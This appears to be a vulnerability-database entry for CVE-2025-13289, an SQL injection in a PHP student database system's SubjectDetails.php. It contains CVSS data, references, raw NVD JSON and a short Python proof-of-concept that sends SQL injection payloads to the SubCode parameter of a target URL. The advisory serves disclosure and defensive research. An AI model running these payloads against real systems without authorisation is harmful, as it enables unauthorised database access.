CVE-2025-13289

Description

A vulnerability was detected in 1000projects Design & Development of Student Database Management System 1.0. Affected is an unknown function of the file /TeacherLogin/Academics/SubjectDetails.php. The manipulation of the argument SubCode results in sql injection. The attack may be performed from remote. The exploit is now public and may be used.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:1000projects:design_\&_development_of_student_database_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE

1000projects Student Database Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-13289 SQL Injection PoC
# Target: Student Database Management System 1.0
# Endpoint: /TeacherLogin/Academics/SubjectDetails.php
# Parameter: SubCode

def exploit_sqli(target_url, payload):
    """
    Exploit SQL injection vulnerability in SubjectDetails.php
    Args:
        target_url: Base URL of the vulnerable application
        payload: Malicious SQL injection payload
    Returns:
        Response from the server
    """
    # Construct the vulnerable endpoint
    endpoint = f"{target_url}/TeacherLogin/Academics/SubjectDetails.php"
    
    # Prepare the request parameters
    params = {
        'SubCode': payload  # Vulnerable parameter
    }
    
    try:
        # Send GET request with malicious payload
        response = requests.get(endpoint, params=params, timeout=10)
        return response
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return None

def main():
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-13289.py <target_url>")
        print("Example: python cve-2025-13289.py http://target.com")
        sys.exit(1)
    
    target = sys.argv[1].rstrip('/')
    
    # Test payloads for SQL injection detection
    test_payloads = [
        "' OR '1'='1",           # Basic boolean-based injection
        "' UNION SELECT NULL--", # Union-based injection test
        "admin'--"               # Authentication bypass attempt
    ]
    
    print(f"[*] Targeting: {target}")
    print(f"[*] Testing CVE-2025-13289 SQL Injection\n")
    
    for payload in test_payloads:
        print(f"[*] Testing payload: {payload}")
        response = exploit_sqli(target, payload)
        if response:
            print(f"[+] Response status: {response.status_code}")
            if response.status_code == 200:
                print(f"[!] Potential vulnerability detected with payload: {payload}")
                print(f"[*] Response length: {len(response.text)} bytes")
    
    print("\n[*] Scan complete")

if __name__ == "__main__":
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13289
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13289
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13289/
[4] VulDB https://vuldb.com/cve/CVE-2025-13289
[5] https://github.com/f14g-orz/CVE/issues/2
[6] https://vuldb.com/?ctiid.332629
[7] https://vuldb.com/?id.332629
[8] https://vuldb.com/?submit.691612

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13289", "sourceIdentifier": "[email protected]", "published": "2025-11-17T16:15:46.307", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was detected in 1000projects Design & Development of Student Database Management System 1.0. Affected is an unknown function of the file /TeacherLogin/Academics/SubjectDetails.php. The manipulation of the argument SubCode results in sql injection. The attack may be performed from remote. The exploit is now public and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:1000projects:design_\\&_development_of_student_database_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "7640B412-33E4-4474-9877-3ED0C4E58FC9"}]}]}], "references": [{"url": "https://github.com/f14g-orz/CVE/issues/2", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://vuldb.com/?ctiid.332629", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.332629", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.691612", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}